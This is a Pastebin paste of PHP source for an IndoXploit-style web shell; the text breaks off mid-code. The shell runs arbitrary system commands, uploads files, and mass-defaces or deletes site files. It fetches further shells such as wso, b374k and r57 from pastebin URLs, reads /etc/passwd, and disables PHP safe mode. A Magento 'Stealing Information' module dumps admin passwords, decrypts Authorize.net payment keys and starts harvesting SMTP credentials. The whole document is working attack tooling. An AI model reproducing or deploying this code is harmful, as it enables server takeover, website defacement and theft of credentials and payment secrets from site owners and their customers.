SHARE
TWEET

Untitled

a guest Oct 4th, 2017 57 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @error_log(0);
  5. @ini_set('error_log',NULL);
  6. @ini_set('log_errors',0);
  7. @ini_set('max_execution_time',0);
  8. @ini_set('output_buffering',0);
  9. @ini_set('display_errors', 0);
  10. @set_time_limit(0);
  11. @set_magic_quotes_runtime(0);
  12. $lol="d73138bef5a01d820e3511ab83562863"; //speedy
  13. function printLogin() {
  14.     ?>
  15. <html>
  16. <head>
  17. <title></title>
  18. <link href='http://i.imgur.com/xEmJPDh.jpg' rel='icon' type='image/x-icon'/>
  19. <meta name='author' content='0x1999'>
  20. <meta charset="UTF-8">
  21. <style type='text/css'>
  22. @import url(https://fonts.googleapis.com/css?family=Abel);
  23. html {
  24.     background: #000000;
  25.     color: #ffffff;
  26.     font-family: 'Abel';
  27.     font-size: 13px;
  28.     width: 100%;
  29. }
  30. input[type=text], input[type=password],input[type=submit] {
  31.     background: transparent;
  32.     color: #008000;
  33.     border: 1px solid #008000;
  34.     margin: 5px auto;
  35.     padding-left: 5px;
  36.     font-family: 'Abel';
  37.     font-size: 13px;
  38. }
  39. </style>
  40. </head>
  41.     <style>
  42.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  43.     </style>
  44.     <center>  
  45.     <form method=post>
  46.     <input type=password name=jancox>
  47.     </form></center>
  48.     <?php
  49.     exit;
  50. }
  51. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  52.     if( empty( $lol ) ||
  53.         ( isset( $_POST['jancox'] ) && ( md5($_POST['jancox']) == $lol ) ) )
  54.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  55.     else
  56.         printLogin();
  57. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  58.     @ob_clean();
  59.     $file = $_GET['file'];
  60.     header('Content-Description: File Transfer');
  61.     header('Content-Type: application/octet-stream');
  62.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  63.     header('Expires: 0');
  64.     header('Cache-Control: must-revalidate');
  65.     header('Pragma: public');
  66.     header('Content-Length: ' . filesize($file));
  67.     readfile($file);
  68.     exit;
  69. }  
  70.    
  71. ?>
  72. <html>
  73. <head>
  74. <title></title>
  75. <meta name='author' content='IndoXploit Recoded By n00bsec team'>
  76. <meta charset="UTF-8">
  77. <style type='text/css'>
  78. @import url(https://fonts.googleapis.com/css?family=Abel);
  79. html {
  80.     background: #000000;
  81.     color: #ffffff;
  82.     font-family: 'Abel';
  83.     font-size: 13px;
  84.     width: 100%;
  85. }
  86. li {
  87.     display: inline;
  88.     margin: 5px;
  89.     padding: 5px;
  90. }
  91. table, th, td {
  92.     border-collapse:collapse;
  93.     font-family: Tahoma, Geneva, sans-serif;
  94.     background: transparent;
  95.     font-family: 'Abel';
  96.     font-size: 13px;
  97. }
  98. .table_home, .th_home, .td_home {
  99.     border: 1px solid #ffffff;
  100. }
  101. th {
  102.     padding: 10px;
  103. }
  104. a {
  105.     color: #ffffff;
  106.     text-decoration: none;
  107. }
  108. a:hover {
  109.     color: gold;
  110.     text-decoration: underline;
  111. }
  112. b {
  113.     color: gold;
  114. }
  115. input[type=text], input[type=password],input[type=submit] {
  116.     background: transparent;
  117.     color: #ffffff;
  118.     border: 1px solid #ffffff;
  119.     margin: 5px auto;
  120.     padding-left: 5px;
  121.     font-family: 'Abel';
  122.     font-size: 13px;
  123. }
  124. textarea {
  125.     border: 1px solid #ffffff;
  126.     width: 100%;
  127.     height: 400px;
  128.     padding-left: 5px;
  129.     margin: 10px auto;
  130.     resize: none;
  131.     background: transparent;
  132.     color: #ffffff;
  133.     font-family: 'Abel';
  134.     font-size: 13px;
  135. }
  136. select {
  137.     background: transparent;
  138.     color: #ffffff;
  139.     border: 1px solid #ffffff;
  140.     margin: 5px auto;
  141.     padding-left: 5px;
  142.     font-family: 'Abel';
  143.     font-size: 13px;
  144. }
  145. .but {
  146.     background: transparent;
  147.     color: #ffffff;
  148.     border: 1px solid #ffffff;
  149.     margin: 5px auto;
  150.     padding-left: 5px;
  151.     font-family: 'Abel';
  152.     font-size: 13px;
  153. }
  154. </style>
  155. </head>
  156. <?php
  157. if (file_exists("php.ini")){
  158. }else{
  159. $img = fopen('php.ini', 'w');
  160. $sec = "safe_mode = OFF
  161. disable_funtions = NONE";
  162. fwrite($img ,$sec);
  163. fclose($img);}     
  164. function w($dir,$perm) {
  165.     if(!is_writable($dir)) {
  166.         return "<font color=red>".$perm."</font>";
  167.     } else {
  168.         return "<font color=lime>".$perm."</font>";
  169.     }
  170. }
  171.     function UrlLoop($url,$type){
  172.  
  173.         $urlArray = array();
  174.  
  175.         $ch = curl_init();
  176.         curl_setopt($ch, CURLOPT_URL, $url);
  177.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  178.         $result = curl_exec($ch);
  179.  
  180.         $regex='|<a.*?href="(.*?)"|';
  181.         preg_match_all($regex,$result,$parts);
  182.         $links=$parts[1];
  183.         foreach($links as $link){
  184.             array_push($urlArray, $link);
  185.         }
  186.         curl_close($ch);
  187.  
  188.         foreach($urlArray as $value){
  189.             $lol="$url$value";
  190.             if(preg_match("#$type#is", $lol)) {
  191.                 echo "$lol\r\n";
  192.             }
  193.         }
  194.     }
  195. function exe($cmd) {    
  196. if(function_exists('system')) {        
  197.         @ob_start();       
  198.         @system($cmd);     
  199.         $buff = @ob_get_contents();        
  200.         @ob_end_clean();       
  201.         return $buff;  
  202.     } elseif(function_exists('exec')) {        
  203.         @exec($cmd,$results);      
  204.         $buff = "";        
  205.         foreach($results as $result) {         
  206.             $buff .= $result;      
  207.         } return $buff;    
  208.     } elseif(function_exists('passthru')) {        
  209.         @ob_start();       
  210.         @passthru($cmd);       
  211.         $buff = @ob_get_contents();        
  212.         @ob_end_clean();       
  213.         return $buff;  
  214.     } elseif(function_exists('shell_exec')) {      
  215.         $buff = @shell_exec($cmd);     
  216.         return $buff;  
  217.     }
  218. }
  219. function perms($file){
  220. $perms = fileperms($file);
  221. if (($perms & 0xC000) == 0xC000) {
  222. $info = 's';
  223. } elseif (($perms & 0xA000) == 0xA000) {
  224. $info = 'l';
  225. } elseif (($perms & 0x8000) == 0x8000) {
  226. $info = '-';
  227. } elseif (($perms & 0x6000) == 0x6000) {
  228. $info = 'b';
  229. } elseif (($perms & 0x4000) == 0x4000) {
  230. $info = 'd';
  231. } elseif (($perms & 0x2000) == 0x2000) {
  232. $info = 'c';
  233. } elseif (($perms & 0x1000) == 0x1000) {
  234. $info = 'p';
  235. } else {
  236. $info = 'u';
  237. }
  238. $info .= (($perms & 0x0100) ? 'r' : '-');
  239. $info .= (($perms & 0x0080) ? 'w' : '-');
  240. $info .= (($perms & 0x0040) ?
  241. (($perms & 0x0800) ? 's' : 'x' ) :
  242. (($perms & 0x0800) ? 'S' : '-'));
  243. $info .= (($perms & 0x0020) ? 'r' : '-');
  244. $info .= (($perms & 0x0010) ? 'w' : '-');
  245. $info .= (($perms & 0x0008) ?
  246. (($perms & 0x0400) ? 's' : 'x' ) :
  247. (($perms & 0x0400) ? 'S' : '-'));
  248. $info .= (($perms & 0x0004) ? 'r' : '-');
  249. $info .= (($perms & 0x0002) ? 'w' : '-');
  250. $info .= (($perms & 0x0001) ?
  251. (($perms & 0x0200) ? 't' : 'x' ) :
  252. (($perms & 0x0200) ? 'T' : '-'));
  253. return $info;
  254. }
  255. function hdd($s) {
  256. if($s >= 1073741824)
  257. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  258. elseif($s >= 1048576)
  259. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  260. elseif($s >= 1024)
  261. return sprintf('%1.2f',$s / 1024 ) .' KB';
  262. else
  263. return $s .' B';
  264. }
  265. function ambilKata($param, $kata1, $kata2){
  266.     if(strpos($param, $kata1) === FALSE) return FALSE;
  267.     if(strpos($param, $kata2) === FALSE) return FALSE;
  268.     $start = strpos($param, $kata1) + strlen($kata1);
  269.     $end = strpos($param, $kata2, $start);
  270.     $return = substr($param, $start, $end - $start);
  271.     return $return;
  272. }
  273. if(get_magic_quotes_gpc()) {
  274.     function idx_ss($array) {
  275.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  276.     }
  277.     $_POST = idx_ss($_POST);
  278. }
  279. function CreateTools($names,$lokasi){
  280.     if ( $_GET['create'] == $names ){
  281.         $a= "".$_SERVER['SERVER_NAME']."";
  282. $b= dirname($_SERVER['PHP_SELF']);
  283. $c = "/cox_tools/".$names.".php";
  284. if (file_exists('cox_tools/'.$names.'.php')){
  285.     echo '<script type="text/javascript">alert("Done");window.location.href = "cox_tools/'.$names.'.php";</script> ';
  286.     }
  287.     else {mkdir("cox_tools", 0777);
  288. file_put_contents('cox_tools/'.$names.'.php', file_get_contents($lokasi));
  289. echo ' <script type="text/javascript">alert("Done");window.location.href = "cox_tools/'.$names.'.php";</script> ';}}}
  290.  
  291. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  292. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  293. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  294. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  295. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
  296. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  297. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  298. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  299. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  300. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  301. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  302. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  303. CreateTools("extractor","http://pastebin.com/raw/dBYyB7S5");
  304. CreateTools("bh","http://pastebin.com/raw/A8TupKkC");
  305. CreateTools("dhanus","http://pastebin.com/raw/W99Pvk3C");
  306. if(isset($_GET['dir'])) {
  307.     $dir = $_GET['dir'];
  308.     chdir($_GET['dir']);
  309. } else {
  310.     $dir = getcwd();
  311. }
  312. $dir = str_replace("\\","/",$dir);
  313. $scdir = explode("/", $dir);
  314. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  315. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  316. $ds = @ini_get("disable_functions");
  317. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  318. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  319. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  320. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  321. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  322. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  323. if(!function_exists('posix_getegid')) {
  324.     $user = @get_current_user();
  325.     $uid = @getmyuid();
  326.     $gid = @getmygid();
  327.     $group = "?";
  328. } else {
  329.     $uid = @posix_getpwuid(posix_geteuid());
  330.     $gid = @posix_getgrgid(posix_getegid());
  331.     $user = $uid['name'];
  332.     $uid = $uid['uid'];
  333.     $group = $gid['name'];
  334.     $gid = $gid['gid'];
  335. }
  336. $d0mains = @file("/etc/named.conf");
  337.             $users=@file('/etc/passwd');
  338.         if($d0mains)
  339.         {
  340.             $count;  
  341.             foreach($d0mains as $d0main)
  342.             {
  343.                 if(@ereg("zone",$d0main))
  344.                 {
  345.                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
  346.                     flush();
  347.                     if(strlen(trim($domains[1][0])) > 2)
  348.                     {
  349.                         flush();
  350.                         $count++;
  351.                     }
  352.                 }
  353.             }
  354.         }
  355.  
  356. $sport=$_SERVER['SERVER_PORT'];
  357. echo "<table style='width:100%'>";
  358. echo "<tr><td>System: <font color=lime>".php_uname()."</font></td></tr>";
  359. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
  360. echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  361. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
  362. echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
  363. echo "<tr><td>Port :<font color=lime>  $sport</font> </td></tr>";
  364. echo "<tr><td>Safe Mode: $sm</td></tr>";
  365. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  366.  
  367. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  368. echo "<tr><td>Current DIR: ";
  369. foreach($scdir as $c_dir => $cdir) {   
  370.     echo "<a href='?dir=";
  371.     for($i = 0; $i <= $c_dir; $i++) {
  372.         echo $scdir[$i];
  373.         if($i != $c_dir) {
  374.         echo "/";
  375.         }
  376.     }
  377.     echo "'>$cdir</a>/";
  378. }
  379. echo "<tr><td><form method='post' action='?dir=$dir&do=cmd'>
  380.     Command :
  381.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  382.     </form></td></tr>";
  383. echo "</table><hr>";
  384. echo "<center>";
  385. echo "<ul>";
  386. echo "<li>[ <a href='?'>Home</a> ]</li>";
  387. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  388. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  389. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  390. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  391. echo "<li>[ <a href='?dir=$dir&do=symconfig'>Config 2</a> ]</li>";
  392. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  393. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]<br></li>";
  394. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  395. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  396. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  397. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  398. echo "<li>[ <a href='?dir=$dir&do=defacerid'>Defacer.ID</a> ]</li>";
  399. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li><br>";
  400. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  401. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  402. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  403. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  404. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  405. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  406. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WordPress Auto Edit User V.2</a> ]</li>";
  407. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Joomla Auto Edit User V.2</a> ]</li>";
  408. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypass etc/passw</a> ]<br></li>";
  409. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
  410. echo "<li>[ <a href='?dir=$dir&do=shellchk'>Shell Checker</a> ]</li>";
  411. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
  412. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
  413. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
  414. echo "<li>[ <a href='?dir=$dir&do=magen'>Magento DB Info</a> ]</li><br>";
  415. echo "<li>[ <a href='?dir=$dir&do=metu'>LogOut</a> ]<br></li>";
  416. echo "</ul>";
  417. echo "</center>";
  418. echo "<hr>";
  419. if($_GET['do'] == 'upload') {
  420.     echo "<center>";
  421.     if($_POST['upload']) {
  422.         if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  423.             $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  424.         } else {
  425.             $act = "<font color=red>failed to upload file</font>";
  426.         }
  427.     }
  428.     echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
  429.     echo $act;
  430.     echo "</center>";
  431. }
  432.  elseif($_GET['do'] == 'cmd') {
  433.     if($_POST['do_cmd']) {
  434.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  435.     }
  436. } elseif($_GET['do'] == 'mass_deface') {
  437.     echo "<center><form action=\"\" method=\"post\">\n";
  438.     $dirr=$_POST['d_dir'];
  439.     $index = $_POST["script"];
  440.     $index = str_replace('"',"'",$index);
  441.     $index = stripslashes($index);
  442.     function edit_file($file,$index){
  443.         if (is_writable($file)) {
  444.         clear_fill($file,$index);
  445.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  446.         }
  447.         else {
  448.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  449.             }
  450.             }
  451.     function hapus_massal($dir,$namafile) {
  452.         if(is_writable($dir)) {
  453.             $dira = scandir($dir);
  454.             foreach($dira as $dirb) {
  455.                 $dirc = "$dir/$dirb";
  456.                 $lokasi = $dirc.'/'.$namafile;
  457.                 if($dirb === '.') {
  458.                     if(file_exists("$dir/$namafile")) {
  459.                         unlink("$dir/$namafile");
  460.                     }
  461.                 } elseif($dirb === '..') {
  462.                     if(file_exists("".dirname($dir)."/$namafile")) {
  463.                         unlink("".dirname($dir)."/$namafile");
  464.                     }
  465.                 } else {
  466.                     if(is_dir($dirc)) {
  467.                         if(is_writable($dirc)) {
  468.                             if(file_exists($lokasi)) {
  469.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  470.                                 unlink($lokasi);
  471.                                 $idx = hapus_massal($dirc,$namafile);
  472.                             }
  473.                         }
  474.                     }
  475.                 }
  476.             }
  477.         }
  478.     }
  479.     function clear_fill($file,$index){
  480.         if(file_exists($file)){
  481.             $handle = fopen($file,'w');
  482.             fwrite($handle,'');
  483.             fwrite($handle,$index);
  484.             fclose($handle);  } }
  485.  
  486.     function gass(){
  487.         global $dirr , $index ;
  488.         chdir($dirr);
  489.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  490.         $files = scandir($dirr) ;
  491.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  492.         sort($files);
  493.         $n = 0 ;
  494.         foreach ($files as $file){
  495.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  496.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  497.                 edit_file($file,$index);
  498.                 flush();
  499.                 $n = $n +1 ;
  500.                 }
  501.                 }
  502.                 echo "<br>";
  503.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  504.                     }
  505.     function ListFiles($dirrall) {
  506.  
  507.     if($dh = opendir($dirrall)) {
  508.  
  509.        $files = Array();
  510.        $inner_files = Array();
  511.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  512.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  513.         while($file = readdir($dh)) {
  514.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  515.                 if(is_dir($dirrall . "/" . $file)) {
  516.                     $inner_files = ListFiles($dirrall . "/" . $file);
  517.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  518.                 } else {
  519.                     array_push($files, $dirrall . "/" . $file);
  520.                 }
  521.             }
  522.             }
  523.  
  524.             closedir($dh);
  525.             return $files;
  526.         }
  527.     }
  528.     function gass_all(){
  529.         global $index ;
  530.         $dirrall=$_POST['d_dir'];
  531.         foreach (ListFiles($dirrall) as $key=>$file){
  532.             $file = str_replace('//',"/",$file);
  533.             echo "<center><strong>$file</strong> ===>";
  534.             edit_file($file,$index);
  535.             flush();
  536.         }
  537.         $key = $key+1;
  538.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  539.     function sabun_massal($dir,$namafile,$isi_script) {
  540.         if(is_writable($dir)) {
  541.             $dira = scandir($dir);
  542.             foreach($dira as $dirb) {
  543.                 $dirc = "$dir/$dirb";
  544.                 $lokasi = $dirc.'/'.$namafile;
  545.                 if($dirb === '.') {
  546.                     file_put_contents($lokasi, $isi_script);
  547.                 } elseif($dirb === '..') {
  548.                     file_put_contents($lokasi, $isi_script);
  549.                 } else {
  550.                     if(is_dir($dirc)) {
  551.                         if(is_writable($dirc)) {
  552.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  553.                             file_put_contents($lokasi, $isi_script);
  554.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  555.                         }
  556.                     }
  557.                 }
  558.             }
  559.         }
  560.     }
  561.     if($_POST['mass'] == 'onedir') {
  562.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  563.         $ini="http://";
  564.         $mainpath=$_POST[d_dir];
  565.         $file=$_POST[d_file];
  566.         $dir=opendir("$mainpath");
  567.         $code=base64_encode($_POST[script]);
  568.         $indx=base64_decode($code);
  569.         while($row=readdir($dir)){
  570.         $start=@fopen("$row/$file","w+");
  571.         $finish=@fwrite($start,$indx);
  572.         if ($finish){
  573.             echo"$ini$row/$file\n";
  574.             }
  575.         }
  576.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  577.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  578.         $dir=opendir("$mainpath");
  579.         $code=base64_encode($_POST[script]);
  580.         $indx=base64_decode($code);
  581.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  582.         $finish=@fwrite($start,$indx);
  583.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  584.         }
  585.  
  586.     }
  587.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  588.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  589.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  590.     elseif($_POST['mass'] == 'massdeface') {
  591.         echo "<div style='margin: 5px auto; padding: 5px'>";
  592.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  593.         echo "</div>";  }
  594.     else {
  595.         echo "
  596.         <center><font style='text-decoration: underline;'>
  597.         Select Type:<br>
  598.         </font>
  599.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  600.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  601.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  602.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  603.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  604.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  605.         <font style='text-decoration: underline;'>Folder:</font><br>
  606.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  607.         <font style='text-decoration: underline;'>Filename:</font><br>
  608.         <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><br>
  609.         <font style='text-decoration: underline;'>Index File:</font><br>
  610.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By 0x1999</textarea><br>
  611.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  612.         </form></center>";
  613.         }
  614.     }
  615. elseif($_GET['do'] == 'magen') {
  616. echo'
  617. <div id="page-wrap">  
  618. <center>  
  619. <br>  
  620. <FORM action=""  method="post">  
  621. <div align="center">[M A G E N T O] - Stealing Information<br>  
  622. <div align="center">coder: sohai & n4KuLa_<br>  
  623. <input type="hidden" name="form_action" value="2">  
  624. </div>  
  625. </div>  
  626. ';  
  627.  
  628.  
  629. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){  
  630.     $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');  
  631.     if(isset($xml->global->resources->default_setup->connection)) {  
  632.        $connection = $xml->global->resources->default_setup->connection;  
  633.        $prefix = $xml->global->resources->db->table_prefix;  
  634.        $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1  
  635.        require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';  
  636.          
  637.        try {  
  638.            $app = Mage::app('default');  
  639.            Mage::getSingleton('core/session', array('name'=>'frontend'));  
  640.        }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}  
  641.  
  642.        if (!mysql_connect($connection->host, $connection->username, $connection->password)){  
  643.            print("Could not connect: " . mysql_error());  
  644.        }  
  645.        mysql_select_db($connection->dbname);  
  646.        echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";  
  647.  
  648.     $crypto = new Varien_Crypt_Mcrypt();  
  649.     $crypto->init($key);  
  650.  
  651.     //=========================================================================================================  
  652.     $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");  
  653.     if (!$query){  
  654.           echo "<center><b>Gagal</b></center>";  
  655.     }else{  
  656.             $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));  
  657.           echo'<br><br>  
  658.                 ====================================================================<br>  
  659.                                 [ Admin FROM website : '.$site['website'].'] <br>  
  660.                 ====================================================================<br>';  
  661.     }  
  662.     echo "  
  663.     <table border='1' align='center' >  
  664.     <tr>  
  665.     <td>id</td>  
  666.     <td>firstname</td>  
  667.     <td>lastname</td>  
  668.     <td>email</td>  
  669.     <td>username</td>  
  670.     <td>password</td>  
  671.     </tr>";  
  672.         while($vx = mysql_fetch_array($query)) {  
  673.         $no = 1;  
  674.         $user_id = $vx['user_id'];  
  675.         $username = $vx['username'];  
  676.         $password = $vx['password'];  
  677.         $email = $vx['email'];  
  678.         $firstname = $vx['firstname'];  
  679.         $lastname = $vx['lastname'];  
  680.         echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";  
  681.         }  
  682.     echo "</table><br>";  
  683.     //=========================================================================================================  
  684.     $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where  path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");  
  685.     if(mysql_num_rows($query) != 0){  
  686.         if (!$query){  
  687.               echo "<center><b>Gagal</b></center>";  
  688.         }else{  
  689.               echo'<br><br>  
  690.                     ====================================================================<br>  
  691.                                     [ Authorizenet ] <br>  
  692.                     ====================================================================<br>';  
  693.         }  
  694.         echo "  
  695.         <table border='1' align='center' >  
  696.         <tr>  
  697.         <td>no</td>  
  698.         <td>user</td>  
  699.         <td>pass</td>      
  700.         </tr>";  
  701.             $no = 1;  
  702.             while($vx = mysql_fetch_array($query)) {  
  703.             $user = $crypto->decrypt($vx['user']);  
  704.             $pass = $crypto->decrypt($vx['pass']);  
  705.  
  706.              
  707.             echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
  708.             $no++;  
  709.             }  
  710.         echo "</table><br>";  
  711.     }  
  712.     //=========================================================================================================  
  713.     $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");  
  714.     if(mysql_num_rows($query_smtp) != 0){  
  715.         if (!$query_smtp){  
  716.               echo "<center><b>Gagal</b></center>";  
  717.         }else{  
  718.               echo'<br><br>  
  719.                     ====================================================================<br>  
  720.                                     [ SMTP ] <br>  
  721.                     ====================================================================<br>';  
  722.         }  
  723.         echo "  
  724.         <table border='1' align='center' >  
  725.         <tr>  
  726.         <td>no</td>  
  727.         <td>host</td>          
  728.         <td>port</td>  
  729.         <td>user</td>  
  730.         <td>pass</td>      
  731.         </tr>";  
  732.             $no = 1;  
  733.             $batas = 0;  
